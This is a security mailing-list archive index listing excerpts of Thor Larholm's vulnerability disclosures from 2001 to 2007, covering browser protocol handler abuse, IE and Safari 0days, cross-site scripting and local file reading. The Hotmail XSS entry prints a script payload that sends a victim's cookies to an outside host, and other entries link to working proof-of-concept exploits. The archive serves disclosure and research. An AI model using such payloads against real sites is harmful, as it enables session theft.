Re: Mozilla protocol abuse

2007-07-26 Thread Thor Larholm
2.0. http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/ Regards Thor Larholm Thor Larholm wrote: The Mozilla application platform currently has an unpatched input validation flaw which allows you to specify arbitrary command line arguments to any registered URL

Mozilla protocol abuse

2007-07-25 Thread Thor Larholm
with the report and the XPI exploits can be found at http://larholm.com/media/2007/7/mozillaprotocolabuse.zip Cheers Thor Larholm

Internet Explorer 0day exploit

2007-07-10 Thread Thor Larholm
handler. The full advisory and a working Proof of Concept exploit can be found at http://larholm.com/2007/07/10/internet-explorer-0day-exploit/ Cheers Thor Larholm

Safari for Windows, 0day URL protocol handler command injection

2007-06-12 Thread Thor Larholm
interaction simply by visiting a webpage. The full advisory and a working Proof of Concept exploit can be found at http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ Cheers Thor Larholm -- I call dibs on the first SafariWin bug

PHPMailer command execution

2007-06-11 Thread Thor Larholm
-execution/ Cheers Thor Larholm

Unpatched input validation flaw in Firefox 2.0.0.4

2007-06-04 Thread Thor Larholm
is that you can still read some local files on Windows and all user accessible files on Linux/Unix/OS X, with all user accessible files potentially readable as well on Windows through the patch regression. http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/ Cheers Thor

Re: Firefox extensions go Evil - Critical Vulnerabilities in Firefox/Firebug

2007-04-06 Thread Thor Larholm
of Firebug should also prevent any closely related vulnerabilities as Joe has updated his domplate constructors to forcefully escape all strings before they are inserted into the console HTML. Cheers Thor Larholm On 4/4/07, pdp (architect) [EMAIL PROTECTED] wrote: http://www.gnucitizen.org/blog

Re: Browser bugs hit IE, Firefox today (SANS)

2006-07-04 Thread Thor Larholm
allows you to overwrite native DOM methods on a thirdparty domain, broadening the potential attack scope by allowing you to interfere with the operations of existing script code inside that thirdparty document. -- Thor Larholm PolyPath, CSO

RE: Notepad popups in Internet Explorer and Outlook

2003-08-14 Thread Thor Larholm
covers the broader picture. I guess the cat is out of the bag now, might as well release that soon ;) Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: Richard M. Smith [mailto:[EMAIL PROTECTED] Sent: Monday, August 04, 2003 11:58 AM

RE: RPC DCOM still vulnerable even after applying patches

2003-07-29 Thread Thor Larholm
crashing svchost. Of course, this is only with the new return addresses that are not tied to any specific servicepack.. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher -Original Message- From: khan rohail [mailto:[EMAIL PROTECTED] Sent: Monday, July 28, 2003 8:34 AM

RE: Drivial Pursuit: Internet Explorer Browser Your Files and Folders !

2003-07-24 Thread Thor Larholm
, both on a webpage and in an email - even with scripting disabled in the Restricted Zone, which has so far been a major mitigating factor. This means that an emailborne exploit would execute immediately when a user opened or previewed an HTML-based email. Regards Thor Larholm PivX Solutions, LLC

Microsoft ISA Server HTTP error handler XSS (TL#007)

2003-07-16 Thread Thor Larholm
Thor Larholm security advisory TL#006 - 16 July 2003 HTML format: http://pivx.com/larholm/adv/TL006 Topic: ISA Server HTTP error handler XSS. Discovery date: 25 June 2002. Severity: Medium Affected applications: -- Any Microsoft

Re: .MHT Buffer Overflow in Internet Explorer

2003-03-12 Thread Thor Larholm
exploitable on websites. Since MHT files are opened automatically, just like certain other media files, you can also open an MHT file automatically through an email message in the Restricted Zone. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher

Re: O UT LO OK E XPRE SS 6 .00 : broken

2003-02-24 Thread Thor Larholm
the Internet Zone for viewing HTML mail? If so, it is also still vulnerable to the codeBase command execution vulnerability, like any other application that is embedding MSHTML. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-Vendor Unreal Engine

Epic Games threatens to sue security researchers

2003-02-11 Thread Thor Larholm
directly against the best interest and security of its own customers. Regards Thor Larholm PivX Solutions, LLC - Senior Security Researcher Latest PivX research: Multi-Vendor Unreal Engine Advisory http://www.pivx.com/press_releases/ueng-adv_pr.html

Notes on MS02-068, extensive downplaying of severity

2002-12-05 Thread Thor Larholm
as severe. http://www.pivx.com/larholm/unpatched/ Regards Thor Larholm, Security Researcher PivX Solutions, LLC Strike Now, StrikeFirst! http://www.pivx.com/sf.html

RE: ZDnet forum: IE formatting local drive

2002-11-16 Thread Thor Larholm
This is just a copy of Andreas Sandblads advisory, with a new command :) Regards Thor Larholm, Security Researcher PivX Solutions, LLC Strike Now, StrikeFirst! http://www.pivx.com/sf.html -Original Message- From: Alan Rouse [mailto:[EMAIL PROTECTED]] Sent: 11. november 2002 17:22

RE: Opera 7 vulnerabilities

2002-11-15 Thread Thor Larholm
Monitoring which pages a user visits is also possible, and in general there seems to be some oversights in this otherwise smooth rewrite. Add to that some of the more odd bugs functionalitywise, and I would say there is room for a beta 2 ;) Regards Thor Larholm, Security Researcher PivX

RE: How to execute programs with parameters in IE - Sandblad advisory #10

2002-11-07 Thread Thor Larholm
zones. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com -Original Message- From: Andreas Sandblad [mailto:sandblad;acc.umu.se] Sent: 6. november 2002 20:48 To: [EMAIL PROTECTED] Subject: How to execute programs with parameters in IE

RE: Vulnerable cached objects in IE (9 advisories in 1)

2002-10-23 Thread Thor Larholm
method and object. At first, I assumed they had made a generic fix, but with this in the open it is clear that they only patched specifics and that there will be many more vulnerabilities in the method/object caching category. Regards Thor Larholm

RE: Who Need Friends ? IE MSN expose contact list other info

2002-10-16 Thread Thor Larholm
This is not a vulnerability or even privacy exposure in MSN, but just a demonstration of zone spoofing by using the %2F encoding bug. All the exposed MSN contact list and information is intentionally, and safely, exposed in the My Computer zone. Regards Thor Larholm, Security Researcher PivX

RE: XSS bug in hotmail login page

2002-10-08 Thread Thor Larholm
.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;sc riptlocation.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl ace('$',document.cookie));/scriptct=1033054530_setlang=,,-1,0 Regards Thor Larholm Jubii A/S - Internet Programmer

RE: MSIE:SaveRef turns Zone off

2002-10-02 Thread Thor Larholm
This also works in IE5.5 as well. Besides reading cookies from arbitrary sites, this vulnerability also allows local file reading and execution - when combined with the OBJECT crossprotocol redirection vulnerability. http://jscript.dk/2002/10/sec/SaveRefLocalFile.html Regards Thor Larholm

Mozilla vulnerabilities, an update

2002-09-18 Thread Thor Larholm
the minor version change 1.0 to 1.0.1, I have no idea about the amount of issues that remain or that has been fixed so far. Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http://www.PivX.com

RE: (Fwd) MSIEv6 % encoding causes a problem again

2002-09-05 Thread Thor Larholm
From: Nick FitzGerald [mailto:[EMAIL PROTECTED]] Hi Thor, Doesn't the following have similar implications to the issue in your TL#002 advisory?? Hi Nick, close but no cigar - yet. In its current state, this % encoding issue cannot escape protocol boundaries, which means that it cannot go

RE: XWT Foundation Advisory

2002-07-30 Thread Thor Larholm
allowed HTTP traffic on (most often) port 80. Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team fixed it by demanding both sites to set document.domain, regardless if one is the parent? Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You Secure? http

RE: warning

2002-07-30 Thread Thor Larholm
case you are out of luck. If your vulnerability did not deal with OWC, then apologize my intrusion and let me guess on a Content-Type/Content-Disposition variant - though your suggested workaround would make no sense then :) Regards Thor Larholm, Security Researcher PivX Solutions, LLC Are You

IE allows universal Cross Domain Scripting (TL#003)

2002-07-10 Thread Thor Larholm
Thor Larholm, PivX, security advisory TL#003 - By Thor Larholm, Denmark 10 July 2002 HTML format: http://www.PivX.com/larholm/adv/TL003/ Topic: IE allows universal Cross Domain Scripting. Discovery date: 25 June 2002. Severity: High Affected applications

RE: Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution vulnerability

2002-06-06 Thread Thor Larholm
it quite easy to e.g. execute arbitrary commands, undoubtedly a more fun demonstration: http://jscript.dk/Jumper/xploit/ftpfolderview.html Status: 18 unpatched vulnerabilities. http://jscript.dk/Unpatched/ Regards Thor Larholm Jubii A/S - Internet Programmer

RE: Update and comments on the MS02-023 patch, holes still remain

2002-05-17 Thread Thor Larholm
not to be the only one who has discovered this fact. GreyMagic Software have updated their advisory on the cssText vulnerability and bundled a new example that works post MS02-023, which can be found at http://sec.greymagic.com/adv/gm004-ie/ Regards Thor Larholm Jubii A/S - Internet Programmer

Update and comments on the MS02-023 patch, holes still remain

2002-05-16 Thread Thor Larholm
a list of 12 such. It can still be found at http://jscript.dk/unpatched/ Just my .02 kroner of comments :) Regards Thor Larholm Jubii A/S - Internet Programmer

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm
files exist. http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp Regards Thor Larholm Jubii A/S - Internet Programmer -Original Message- From: GreyMagic Software [mailto:[EMAIL PROTECTED]] Sent: 30. april 2002 03:11 To: NTBugtraq; Bugtraq Subject: Reading local files in Netscape 6

RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm
that also works in moz1rc1 can be found at http://jscript.dk/2002/4/NS6Tests/documentload.html Regards Thor Larholm Jubii A/S - Internet Programmer

IE allows universal Cross Site Scripting (TL#002)

2002-04-16 Thread Thor Larholm
Thor Larholm security advisory TL#002 - By Thor Larholm, Denmark. 16 April 2002 HTML Format: http://jscript.dk/adv/TL002/ Topic: IE allows universal Cross Site Scripting. Discovery date: 18 March 2002. Severity: High Affected applications

IIS allows universal CrossSiteScripting

2002-04-10 Thread Thor Larholm
Thor Larholm security advisory TL#001 - By Thor Larholm, Denmark. 10 April 2002 HTML format: http://jscript.dk/adv/TL001/ Topic: IIS allows universal CrossSiteScripting. Discovery date: 13 March 2002. Severity: Medium Affected applications

RE: MS 3/28/02 Security Patch for IE6 - warning!

2002-04-02 Thread Thor Larholm
Further, the patch doesn't seem to work completely: http://www.theregister.co.uk/content/4/24667.html Though, in other cases, it works better than expected: http://jscript.dk/unpatched/N280302-01.html A revision of the patch may be in place. Regards Thor Larholm Jubii A/S - Internet

Stack Overflow in MSHTML.DLL

2001-01-15 Thread Thor Larholm
ft was contacted on 4 December 2000. Bug is considered to be a code quality bug, and will be adressed in a future SP for IE. -- Thor Larholm